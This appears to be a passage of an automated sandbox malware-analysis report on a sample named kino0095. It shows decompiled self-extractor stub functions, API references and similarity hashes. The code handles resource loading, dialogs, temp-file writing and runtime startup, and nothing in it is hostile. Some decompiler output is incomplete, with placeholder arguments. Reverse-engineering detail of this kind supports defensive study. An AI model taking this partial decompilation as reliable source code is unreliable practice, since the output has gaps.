			_t19 = _t28 + 1;
			do {                                    // length is computed a second time for the copy call
				_t9 =  *_t28;
				_t28 = _t28 + 1;
			} while (_t9 != 0);
			E010B1680(_t24, _t28 - _t19 + 1, _t33); // copy the string into the new buffer (dest, size, src)
			_t11 =  *0x10b91e0; // 0xef7a50         // current list head (global)
			 *(_t34 + 4) = _t11;                    // node->next = old head
			 *0x10b91e0 = _t34;                     // head = node: push onto a singly linked list of strings
			return 1;                               // success
		}
		_t25 =  *0x10b8584; // 0x0                  // global window handle passed to the error routine
		E010B44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8); // report the failed allocation (id 0x4b5); _t8 is never assigned in the decompiler output
		LocalFree(_t34);                            // release the node whose string buffer could not be allocated
		L2:
		return 0;                                   // failure
	}
	_t26 =  *0x10b8584; // 0x0                      // node allocation itself failed: same error path, nothing to free
	E010B44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);   // _t5 is likewise unassigned in the decompiler output
	goto L2;
}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,010B4E6F), ref: 010B47EA
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 010B4823
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 010B4847
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Pz
                                                                                                                                                                                                                                    • API String ID: 359063898-2830093337
                                                                                                                                                                                                                                    • Opcode ID: fbbe18846edfbbd12820475b7dcf75190fdde10f5f553ec259164103df99961b
                                                                                                                                                                                                                                    • Instruction ID: d0a4c4ccd82378db318cd65dd56835b2931d7dfd86e5e8171a9e71c46f5aee37
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbbe18846edfbbd12820475b7dcf75190fdde10f5f553ec259164103df99961b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C91159B4600601AFD7658E2498D8FFA3B9EEBC5300B048859EEC3C7346CA3AC906C720
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 32%
			E010B4169(void* __eflags) {
				int _t18;
				int _t20; /* return value of E010B468F; the decompiler also referred to it as _t3 */
				void* _t21;

				_t20 = E010B468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t20 * 4);
				if(_t21 != 0) {
					if(E010B468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E010B44B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E010B44B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
  • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
  • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
  • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
  • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
  • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
  • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
• LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010B30B4), ref: 010B4189
• LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010B30B4), ref: 010B41E7
  • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
  • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
• String ID: <None>$FINISHMSG
• API String ID: 3507850446-3091758298
• Opcode ID: 0328c3a639c506d33f63fc021e488a30f4ca5ae758aa773ad9bf24ecef7d682c
• Instruction ID: bc8cd401ac6502bea6291c14f9f1d13ce78029b57fb817700f9ceb681d872b1d
• Opcode Fuzzy Hash: 0328c3a639c506d33f63fc021e488a30f4ca5ae758aa773ad9bf24ecef7d682c
• Instruction Fuzzy Hash: 9B0121B1B40214BBF32416699CD4FFB218EDBD8A84F004426BBC7E2182DE6CCE0001B4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E010B7155() {
	void* _v8;
	struct _FILETIME _v16;
	signed int _v20;
	union _LARGE_INTEGER _v24;
	signed int _t23;
	signed int _t36;
	signed int _t37;
	signed int _t39;

	_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
	_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
	_t23 =  *0x10b8004; // 0x72151d89
	if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
		GetSystemTimeAsFileTime( &_v16);
		_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
		_v8 = _v8 ^ GetCurrentProcessId();
		_v8 = _v8 ^ GetCurrentThreadId();
		_v8 = GetTickCount() ^ _v8 ^  &_v8;
		QueryPerformanceCounter( &_v24);
		_t36 = _v20 ^ _v24.LowPart ^ _v8;
		_t39 = _t36;
		if(_t36 == 0xbb40e64e || ( *0x10b8004 & 0xffff0000) == 0) {
			_t36 = 0xbb40e64f;
			_t39 = 0xbb40e64f;
		}
		 *0x10b8004 = _t39;
	}
	_t37 =  !_t36;
	 *0x10b8008 = _t37;
	return _t37;
}

APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010B7182
• GetCurrentProcessId.KERNEL32 ref: 010B7191
• GetCurrentThreadId.KERNEL32 ref: 010B719A
• GetTickCount.KERNEL32 ref: 010B71A3
• QueryPerformanceCounter.KERNEL32(?), ref: 010B71B8
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: 589be69769917a7c28eca80547c6cec5288400357540cd074c20fdace3118528
• Instruction ID: ed3e8486e1fedb05290a151bb5135dd227049324048519ff42f2043a2603e6bc
• Opcode Fuzzy Hash: 589be69769917a7c28eca80547c6cec5288400357540cd074c20fdace3118528
• Instruction Fuzzy Hash: 45111F71E11208DFCB60DFBCD6886DEB7F9EF48355F5148A6E845E7244D6359A008B50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
E010B19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
	signed int _v8;
	char _v520;
	void* __esi;
	signed int _t11;
	void* _t14;
	void* _t23;
	void* _t27;
	void* _t33;
	struct HWND__* _t34;
	signed int _t35;

	_t33 = __edi;
	_t27 = __ebx;
	_t11 =  *0x10b8004; // 0x72151d89
	_v8 = _t11 ^ _t35;
	_t34 = _a4;
	_t14 = _a8 - 0x110;
	if(_t14 == 0) {
		_t32 = GetDesktopWindow();
		E010B43D0(_t34, _t15);
		_v520 = 0;
		LoadStringA( *0x10b9a3c, _a16,  &_v520, 0x200);
		SetDlgItemTextA(_t34, 0x83f,  &_v520);
		MessageBeep(0xffffffff);
		goto L6;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_t14 != 1) {
                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t32 = _a12;
                                                                                                                                                                                                                                    						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                    							_t23 = 1;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E010B6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                    			}

APIs
• EndDialog.USER32(?,?), ref: 010B1A18
• GetDesktopWindow.USER32 ref: 010B1A24
• LoadStringA.USER32(?,?,00000200), ref: 010B1A4F
• SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 010B1A62
• MessageBeep.USER32(000000FF), ref: 010B1A6A
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
• String ID:
• API String ID: 1273765764-0
• Opcode ID: 44fdf9e0eb9450e442632142bb746d71589cf68559f17add040846008ba109b8
• Instruction ID: de0802f9aee1a199df22c2cdda5d9db77db33c06e78f27b1673c9d3bac4ece28
• Opcode Fuzzy Hash: 44fdf9e0eb9450e442632142bb746d71589cf68559f17add040846008ba109b8
• Instruction Fuzzy Hash: 4611C831600109EFDB60EF68ED88AEE77F8EF49350F008565F992D7184DA35AE01CB95
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%
E010B63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
	signed int _v8;
	char _v268;
	long _v272;
	void* _v276;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t15;
	long _t28;
	struct _OVERLAPPED* _t37;
	void* _t39;
	signed int _t40;

	_t15 =  *0x10b8004; // 0x72151d89
	_v8 = _t15 ^ _t40;
	_v272 = _v272 & 0x00000000;
	_push(__ecx);
	_v276 = _a16;
	_t37 = 1;
	E010B1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
	E010B658A( &_v268, 0x104, _a12);
	_t28 = 0;
	_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
	if(_t39 != 0xffffffff) {
		_t28 = _a4;
		if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
			 *0x10b9124 = 0x80070052;
			_t37 = 0;
		}
		CloseHandle(_t39);
	} else {
		 *0x10b9124 = 0x80070052;
		_t37 = 0;
	}
	return E010B6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
}
                                                                                                                                                                                                                                    0x010b643a
                                                                                                                                                                                                                                    0x010b6444
                                                                                                                                                                                                                                    0x010b6444
                                                                                                                                                                                                                                    0x010b6492

APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010B642D
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010B645B
• CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 010B647A
Strings
• C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010B63EB
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
• API String ID: 1065093856-1116576409
• Opcode ID: 7cd220991c1a8703a89548c550cfe95bd386dfdd18da1afd8d188bfb22fdc6d5
• Instruction ID: 8a7e6b6c69787f3143b46d5527f2c23a99351c4b1b5d59997abb5e8cc4682d37
• Opcode Fuzzy Hash: 7cd220991c1a8703a89548c550cfe95bd386dfdd18da1afd8d188bfb22fdc6d5
• Instruction Fuzzy Hash: 4421C3B1A0021CABD760DF25DCC4FEA77A8EB45314F0045A9A6C5A3240DBB95D848F64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 77%
E010B6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
	struct HRSRC__* _t6;
	void* _t21;
	struct HINSTANCE__* _t23;
	int _t24;

	_t23 =  *0x10b9a3c; // 0x10b0000
	_t6 = FindResourceA(_t23, __edx, 5);
	if(_t6 == 0) {
		L6:
		E010B44B9(0, 0x4fb, 0, 0, 0x10, 0);
		_t24 = _a16;
	} else {
		_t21 = LoadResource(_t23, _t6);
		if(_t21 == 0) {
			goto L6;
		} else {
			if(_a12 != 0) {
				_push(_a12);
			} else {
				_push(0);
			}
			_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
			FreeResource(_t21);
			if(_t24 == 0xffffffff) {
				goto L6;
			}
		}
	}
	return _t24;
}

APIs
• FindResourceA.KERNEL32(010B0000,000007D6,00000005), ref: 010B652A
• LoadResource.KERNEL32(010B0000,00000000,?,?,010B2EE8,00000000,010B19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010B6538
• DialogBoxIndirectParamA.USER32(010B0000,00000000,00000547,010B19E0,00000000), ref: 010B6557
• FreeResource.KERNEL32(00000000,?,?,010B2EE8,00000000,010B19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010B6560
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Resource$DialogFindFreeIndirectLoadParam
• String ID:
• API String ID: 1214682469-0
• Opcode ID: 81bca4991eb737fd5c3540675561d78b4f05cc245eb74033adeaa2325870e888
• Instruction ID: 34c6c265af744e4056d8634f34d221aca8f14bbcc084721db0a5f1f3ebd392fd
• Opcode Fuzzy Hash: 81bca4991eb737fd5c3540675561d78b4f05cc245eb74033adeaa2325870e888
• Instruction Fuzzy Hash: FE012672200205BBDB205EA99CC8DFB7AACEB85360F000165FE8493148DB77CD208BA0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E010B3680(void* __ecx) {
	void* _v8;
	struct tagMSG _v36;
	int _t8;
	struct HWND__* _t16;

	_v8 = __ecx;
	_t16 = 0;
	while(1) {
		_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
		if(_t8 == 0) {
			break;
		}
                                                                                                                                                                                                                                    					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                    								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t16 = 1;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                    						} while (_t8 != 0);
                                                                                                                                                                                                                                    						if(_t16 == 0) {
                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                                                    			}

Disassembly address column (instruction text not present in the extracted report): 0x010b368c, 0x010b368f, 0x010b3691, 0x010b369f, 0x010b36a7, 0x00000000, 0x00000000, 0x010b36ba, 0x00000000, 0x010b36bc, 0x010b36bc, 0x010b36c0, 0x010b36cb, 0x010b36c2, 0x010b36c4, 0x010b36c4, 0x010b36da, 0x010b36e0, 0x010b36e6, 0x00000000, 0x00000000, 0x010b36e6, 0x00000000, 0x010b36ba, 0x010b36ed

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010B369F
                                                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010B36B2
                                                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 010B36CB
                                                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010B36DA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2776232527-0
                                                                                                                                                                                                                                    • Opcode ID: 6cef93d102463e37576b3419420292c68232da0dcc9d3a8360899e193006f509
                                                                                                                                                                                                                                    • Instruction ID: 33117b20f2be4fc36fc5d05a1e7a860421110f1e326b4e416e25e47ca371bdc5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cef93d102463e37576b3419420292c68232da0dcc9d3a8360899e193006f509
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2018472A00214BBDB704AAA5C88EEB7ABCFB89B10F104269FA45E6184D5658540C760
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E010B65E8(char* __ecx) {
                                                                                                                                                                                                                                    				char _t3;
                                                                                                                                                                                                                                    				char _t10;
                                                                                                                                                                                                                                    				char* _t12;
                                                                                                                                                                                                                                    				char* _t14;
                                                                                                                                                                                                                                    				char* _t15;
                                                                                                                                                                                                                                    				CHAR* _t16;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t12 = __ecx;
                                                                                                                                                                                                                                    				_t15 = __ecx;
                                                                                                                                                                                                                                    				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                    				_t10 = 0;
                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                    					_t3 =  *_t12;
                                                                                                                                                                                                                                    					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                    				} while (_t3 != 0);
                                                                                                                                                                                                                                    				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                    					if(_t16 <= _t15) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                    						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                    							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *_t16 = _t10;
                                                                                                                                                                                                                                    						_t10 = 1;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_push(_t16);
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                    					return _t10;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                                                    			}

Disassembly address column (instruction text not present in the extracted report): 0x010b65e8, 0x010b65ed, 0x010b65ef, 0x010b65f2, 0x010b65f4, 0x010b65f4, 0x010b65f6, 0x010b65f7, 0x010b6608, 0x010b6611, 0x010b6618, 0x010b661c, 0x00000000, 0x00000000, 0x010b660e, 0x010b6623, 0x010b6625, 0x010b663b
                                                                                                                                                                                                                                    0x010b663b
                                                                                                                                                                                                                                    0x010b663d
                                                                                                                                                                                                                                    0x010b6641
                                                                                                                                                                                                                                    0x010b6610
                                                                                                                                                                                                                                    0x010b6610
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6610
                                                                                                                                                                                                                                    0x010b6644
                                                                                                                                                                                                                                    0x010b6647
                                                                                                                                                                                                                                    0x010b6647
                                                                                                                                                                                                                                    0x010b6621
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

APIs
• CharPrevA.USER32(?,00000000,00000000,00000001,00000000,010B2B33), ref: 010B6602
• CharPrevA.USER32(?,00000000), ref: 010B6612
• CharPrevA.USER32(?,00000000), ref: 010B6629
• CharNextA.USER32(00000000), ref: 010B6635
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Char$Prev$Next
• String ID:
• API String ID: 3260447230-0
• Opcode ID: 49427434bf2d7fc8e8040f287972f71b06ffbd5ea88ff9efd6da4ae7c4744812
• Instruction ID: c8a74180bbb3d891c0e441d57b9071e651517cc504aa42f79eeea453108685ec
• Opcode Fuzzy Hash: 49427434bf2d7fc8e8040f287972f71b06ffbd5ea88ff9efd6da4ae7c4744812
• Instruction Fuzzy Hash: 17F02832105150AEE7730A2C8CC89FBBFDCDF8F19471905EFE8D193101D61B09068B61
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiled CRT startup stub: sets the application type, the default
   file/commit modes, and installs the user math-error handler before
   handing control to the real entry routine. */
E010B69B0() {
	intOrPtr* _t4;
	intOrPtr* _t5;
	void* _t6;
	intOrPtr _t11;
	intOrPtr _t12;

	 *0x10b81f8 = E010B6C70();
	__set_app_type(E010B6FBE(2));
	 *0x10b88a4 =  *0x10b88a4 | 0xffffffff;
	 *0x10b88a8 =  *0x10b88a8 | 0xffffffff;
	_t4 = __p__fmode();          /* copy global _fmode into the CRT */
	_t11 =  *0x10b8528; // 0x0
	 *_t4 = _t11;
	_t5 = __p__commode();        /* copy global _commode into the CRT */
	_t12 =  *0x10b851c; // 0x0
	 *_t5 = _t12;
	_t6 = E010B7000();
	if( *0x10b8000 == 0) {
		__setusermatherr(E010B7000); /* install math-error callback */
	}
	E010B71EF(_t6);
	return 0;
}








                                                                                                                                                                                                                                    0x010b69b7
                                                                                                                                                                                                                                    0x010b69c2
                                                                                                                                                                                                                                    0x010b69c8
                                                                                                                                                                                                                                    0x010b69cf
                                                                                                                                                                                                                                    0x010b69d8
                                                                                                                                                                                                                                    0x010b69de
                                                                                                                                                                                                                                    0x010b69e4
                                                                                                                                                                                                                                    0x010b69e6
                                                                                                                                                                                                                                    0x010b69ec
                                                                                                                                                                                                                                    0x010b69f2
                                                                                                                                                                                                                                    0x010b69f4
                                                                                                                                                                                                                                    0x010b6a00
                                                                                                                                                                                                                                    0x010b6a07
                                                                                                                                                                                                                                    0x010b6a0d
                                                                                                                                                                                                                                    0x010b6a0e
                                                                                                                                                                                                                                    0x010b6a15

APIs
  • Part of subcall function 010B6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 010B6FC5
• __set_app_type.MSVCRT ref: 010B69C2
• __p__fmode.MSVCRT ref: 010B69D8
• __p__commode.MSVCRT ref: 010B69E6
• __setusermatherr.MSVCRT ref: 010B6A07
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
• Opcode ID: 1ac10c74a99a4606ffbc2ced5b9081cb86f07f624a496a2c53f0320d00224a4f
• Instruction ID: 35d7177b4e10ec3674c1ee704309aa3924d0a09f1180a43db0e9d71f2f729be1
• Opcode Fuzzy Hash: 1ac10c74a99a4606ffbc2ced5b9081cb86f07f624a496a2c53f0320d00224a4f
• Instruction Fuzzy Hash: 7BF09874615316DFDB79AF38E5D96D43BA9FB54321B10861AE4E1862E8CF3F85408B10
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 26.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 965
Total number of Limit Nodes: 41
Execution Graph

